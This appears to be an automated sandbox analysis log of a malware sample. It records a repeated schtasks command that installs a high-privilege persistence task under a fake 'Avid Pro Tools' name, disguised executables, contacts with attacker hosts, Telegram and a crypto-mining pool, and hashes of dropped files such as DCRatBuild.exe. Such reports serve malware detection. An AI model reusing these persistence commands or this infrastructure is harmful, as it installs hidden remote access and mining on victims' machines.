C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\wscript.exe

C:\winNet\wscript.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.nodejs.org udp
US 104.20.22.46:443 www.nodejs.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 nodejs.org udp
US 104.20.22.46:443 nodejs.org tcp
US 8.8.8.8:53 aka.ms udp
DE 104.119.110.121:443 aka.ms tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 article-coal.gl.at.ply.gg udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 papka.top udp
US 172.67.169.72:80 papka.top tcp
US 172.67.169.72:80 papka.top tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 729231cm.n9shteam1.top udp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
US 8.8.8.8:53 ozero.top udp
FI 77.105.133.52:80 ozero.top tcp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
FI 77.105.133.52:80 ozero.top tcp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 729231cm.n9shteam1.top udp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
US 8.8.8.8:53 ozero.top udp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 article-coal.gl.at.ply.gg udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 729231cm.n9shteam1.top udp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
US 8.8.8.8:53 ozero.top udp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 729231cm.n9shteam1.top udp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
US 8.8.8.8:53 ozero.top udp
FI 77.105.133.52:80 ozero.top tcp

Files

\Users\Admin\AppData\Local\Temp\Youtube.exe

MD5 d25ebdfc04bdadea74017fa72f90781f
SHA1 f7278c4d04fc4db888368e0245d7607d8bcbb557
SHA256 9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
SHA512 77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe

MD5 54276fc2dfafc0b610f08ba739a0f5ee
SHA1 dc61f3b768f2b1423c949d0ce761606f594aee8c
SHA256 9bb53f37a4b196c0031047936fbf6f029aa845d4610e77cabed1d370f04f229b
SHA512 9d5ed9cab660d270e4749d51bc4aefd251c64e6bd90fe70588668002522ac00148a33f03a1127141772f42c7e7a0510b3218a89e9e1209836cebb3371dbceb22

memory/2756-18-0x0000000000400000-0x0000000000D8F000-memory.dmp

memory/2736-21-0x00000000002B0000-0x0000000000330000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Result.exe

MD5 170b43350048ed4b6fca0e50a0178621
SHA1 db863b7b04a7c58baa9120e2f184517ed27a7252
SHA256 248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b
SHA512 e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7

\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

MD5 7529e4004c0fe742df146464e6aeadb0
SHA1 ae7341ee066b31de5a1a1a25851b70ced41de13f
SHA256 a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81
SHA512 d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

MD5 36b62ba7d1b5e149a2c297f11e0417ee
SHA1 ce1b828476274375e632542c4842a6b002955603
SHA256 8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c
SHA512 fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

\Users\Admin\AppData\Local\Temp\solara.exe

MD5 1797c0e37f4b9dd408cbf0d7bfcb7c95
SHA1 10df695351ac6074e23a3d3b4bd31a17c10fd614
SHA256 8a1b256aa65d666d8b566576c86065bb9401483f705bce0c597fc27b9cde2cfb
SHA512 52289cb15c7b2c5a600da9e9894f5dbc66566eff9c864488dfd8d318800fbbf8622a3dad79f7f5aec6d77badfc0707010ffffe521eef8f218be33e07092010b1

C:\winNet\we9fgyC144zVOkGk.vbe

MD5 aa1a085aba94a5fc38c26b79a2217336
SHA1 f847af2aec7fd56fe8734ccb51d8027b9b4e817b
SHA256 f66e935da9738cbddac905b9b55a2cfe5003aab76863b180a28e42238cbaa545
SHA512 75f66a848dc09ea859d7ddad59f6d7cac148936340eef14c4ad6cec7d4d92cf0c32bdaf911c0d943e7c478445118852180bdaceb72d9d4aae919f99cd6538981

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe

MD5 1a3448b944b91cebda73adc5064e6286
SHA1 4f8716c6e56a675944a5f0f250947c8d45a362e1
SHA256 5b489dab912970289bd0bfb41928010990288e7a3ec8acb18f637e670c50e0e5
SHA512 b355ffb98b0744cc6a1baaff7645c862344b12cfc251a1a243da666f7d41f8eea8b6a179faaeb600ffd4b4ce51b8c3f942c0cc6bd06875a4b80440468ce63795

C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

MD5 3492e48fb2e9fb2bfc18658e3d8f88bd
SHA1 34cec8222aedc8baf774aa863a041a23971c7631
SHA256 c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e
SHA512 a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9

memory/2272-101-0x0000000000AE0000-0x0000000000BAE000-memory.dmp

memory/2544-72-0x0000000000400000-0x000000000069B000-memory.dmp

\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

MD5 7d4b84a8c3d14cb3d1bb864719463404
SHA1 544cf51aec717c63552f0fdf97d364b1b62a7a0c
SHA256 3aa0597b5d053594cce551ac5d8a9bc83059c3d55ef024dc7dff59c73a88e663
SHA512 d962cbe9998d2e04a9bbd2ab1a97535409015b183acc0d61d49f6b696eac046e7c41028b55c8d33c3b6c1dacbf3704771dbdf911b06c8e9c247b49d2c6864a29

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat

MD5 83a7f739f51f1acd83f143afa6ec1533
SHA1 2f653f906842f8f507d02f81550eb26a35f38acc
SHA256 5faae2c746c71afcb3dc0b9eb4fbf6087786936484f62ee08412a94c13642545
SHA512 c4487c0ca0e630ee8daf2443c290fac2d0de60b0ce36c28e6451cfd66b2b81669a87726da31d4e172d2794a0345bbe9111402486b6e28d941fb6d124be604793

memory/2124-107-0x0000000000350000-0x00000000004D4000-memory.dmp

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

MD5 9cf4017a8383ae846a908c79a28354bf
SHA1 adbe6a02b90147431e80fc38100de42d88dd765a
SHA256 bc7ea8011a8098690cf8976f14533fdbd5a0532818ed30365ef5412a256516f2
SHA512 490a19bdd35657a50e72f2c133c8d731cf1cccd14dc4ce9648d22f486540edd9f7448eb4d2840d52bd7601c52036572937b4c79bc32206eb98b7dc76765d1f00

memory/2692-68-0x0000000000400000-0x0000000000CC7000-memory.dmp

\Users\Admin\AppData\Local\Temp\Frage build.exe

MD5 11fdce42422f8ed518fedf290f5bfc3c
SHA1 f18a4ad694af5ba50a7697b4cb66308454c555d9
SHA256 b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3
SHA512 4e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae

memory/2124-108-0x0000000000340000-0x000000000034E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab408B.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar40FB.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2124-143-0x0000000000630000-0x000000000064C000-memory.dmp

memory/2124-146-0x0000000000680000-0x0000000000690000-memory.dmp

memory/2124-145-0x0000000000650000-0x0000000000666000-memory.dmp

memory/2124-144-0x0000000000610000-0x0000000000618000-memory.dmp

memory/2124-147-0x0000000002040000-0x000000000204E000-memory.dmp

memory/2124-148-0x0000000000690000-0x000000000069E000-memory.dmp

memory/2124-149-0x0000000002050000-0x000000000205A000-memory.dmp

memory/2124-150-0x0000000002060000-0x000000000206C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a4d3147a3951e32147bb6e429507b1d4
SHA1 d9a9d6b087291748c13efbcb348979669371893f
SHA256 8d3d64cd2422465d718db5d9e1f97729a1c40d6c44e7f71bc7efd7fd36ae1169
SHA512 20a64f3d3ebb111f8ccb2da41399bb275f8b54aae94c519885b7ccbe9cdf9239a36a9cdc10319a1ac6f69ad26ec24853a04fe96dca975cc670b352b0c977137d

memory/788-214-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

memory/788-207-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KAuKjb5uOJ.bat

MD5 23d7f0db9072a4d28ffe70683fb821e4
SHA1 3511edb43b2980a34547c849637bd62a1e12d00d
SHA256 8b9f273dbc2d046ade270d0512bb5d56a620aba4fbada4653aeecb39d3d89d36
SHA512 d2b3f01aa0219a08ccaa4e866bc2fa4f710d34eee1baa88fd508fe1ef8580569a6f40f33c5326ca5c01b9dc3a0fde6940418d8a349b90845a6388db98a8b24a8

C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

MD5 0e4e9aa41d24221b29b19ba96c1a64d0
SHA1 231ade3d5a586c0eb4441c8dbfe9007dc26b2872
SHA256 5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d
SHA512 e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2c386aa946df6b1370164ccccf55e450
SHA1 6b12a199e37e50fc9f0e65076a21456a73b64e62
SHA256 97d83f928d6eb1d28481daeec317b7b1f0c0121ea6bdc0f40396186c9fcfff9f
SHA512 bfe9c89a638b7503605f386ae0985b68fd0ff8d985b9d62d9270ed5f9330be772e32681310a7060e3defe5d5bc1afd5a3a1763246f96c520490475e18953cf99

C:\Windows\Installer\MSI58FF.tmp

MD5 9fe9b0ecaea0324ad99036a91db03ebb
SHA1 144068c64ec06fc08eadfcca0a014a44b95bb908
SHA256 e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9
SHA512 906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176

memory/484-301-0x0000000001110000-0x0000000001294000-memory.dmp

memory/2448-302-0x0000000000210000-0x0000000000431000-memory.dmp

memory/2448-305-0x000000001B3D0000-0x000000001B5F0000-memory.dmp

memory/1520-306-0x00000000FFF20000-0x00000000FFF68000-memory.dmp

memory/2128-313-0x000000001B850000-0x000000001BB32000-memory.dmp

memory/1520-315-0x00000000FFF20000-0x00000000FFF68000-memory.dmp

memory/2128-314-0x0000000002290000-0x0000000002298000-memory.dmp

memory/2556-324-0x000000001B550000-0x000000001B832000-memory.dmp

memory/2148-397-0x00000000002E0000-0x0000000000476000-memory.dmp

C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\audiodg.exe

MD5 e41ef428aaa4841f258a38dc1cc305ef
SHA1 edf3a17831e013b74479e2e635b8cf0c1b3787ce
SHA256 6c02076f8f42678e0576a71ff170ed84b203a0e5e9a31bda9aed912822f25995
SHA512 a92a30077601aaf34a05ceaab5738ad2aa585498868bb6b675dd43d332c46424c859ed19cf0159b04fcf7b4da3b773e37ca064e8975a43964cc6a654661f46bd

memory/560-413-0x0000000000C70000-0x0000000000E4A000-memory.dmp

memory/560-415-0x0000000000190000-0x000000000019E000-memory.dmp

memory/560-417-0x00000000001A0000-0x00000000001BC000-memory.dmp

memory/560-419-0x00000000001C0000-0x00000000001D8000-memory.dmp

memory/560-421-0x00000000001E0000-0x00000000001EC000-memory.dmp

memory/2524-569-0x000000001B690000-0x000000001B972000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1WQDCN01NHEORDRND4P4.temp

MD5 8ae55f9fe359e97ef3ef9f98a44e7a1e
SHA1 72dd9197cb278388f8c97bb55788a636bba89315
SHA256 8adb49c9b85dc5d4ce2609eeedc257cce6709407a9e34e318b88ba576a02640e
SHA512 9be3b911f70d656716cb7a9bfcd3e2216539c308a95f6decd440ce0f62795f1a09571032421320fdd0645776dbfaf8ce4214bebc4296ae9a0c5d64ed02e52c0e

memory/2760-667-0x000007FEF2090000-0x000007FEF20B2000-memory.dmp

memory/2096-668-0x000007FEF2090000-0x000007FEF20B2000-memory.dmp

memory/1972-674-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2292-677-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2044-678-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/916-679-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1900-682-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2644-683-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2212-684-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2248-687-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2148-688-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1664-691-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2588-692-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2900-695-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1436-697-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2196-696-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1380-700-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2844-701-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1852-702-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2340-703-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1760-706-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1520-707-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2220-710-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1400-711-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/3020-713-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2960-712-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2468-716-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2880-719-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2528-722-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2372-723-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1944-724-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1064-727-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/3068-728-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1616-729-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1460-732-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2792-733-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2236-734-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1904-735-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1160-736-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2596-741-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1148-740-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1856-743-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1256-742-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2308-753-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1860-759-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/2412-758-0x000000001B7B0000-0x000000001BA92000-memory.dmp

memory/2248-769-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2620-768-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2788-771-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1852-772-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1860-790-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2100-791-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2368-860-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2004-859-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1640-845-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2068-844-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2452-831-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2580-852-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2112-855-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2328-854-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/2412-851-0x000007FEF1F90000-0x000007FEF1FB2000-memory.dmp

memory/1708-867-0x0000000000140000-0x0000000000148000-memory.dmp

memory/1820-871-0x0000000000060000-0x00000000001F6000-memory.dmp

memory/1860-870-0x0000000001080000-0x000000000125A000-memory.dmp

memory/1544-927-0x0000000000360000-0x00000000004E4000-memory.dmp

memory/1708-995-0x0000000000A20000-0x0000000000BB6000-memory.dmp

memory/2736-997-0x00000000004D0000-0x00000000004DC000-memory.dmp

memory/2900-1252-0x00000000001F0000-0x00000000001F6000-memory.dmp

memory/2132-3290-0x00000000000F0000-0x00000000000F8000-memory.dmp

memory/2412-3850-0x0000000000CB0000-0x0000000000CB8000-memory.dmp

memory/1428-4033-0x0000000000D30000-0x0000000000EB4000-memory.dmp

memory/2692-4456-0x0000000000250000-0x00000000003D4000-memory.dmp

memory/1828-5044-0x0000000001000000-0x0000000001184000-memory.dmp

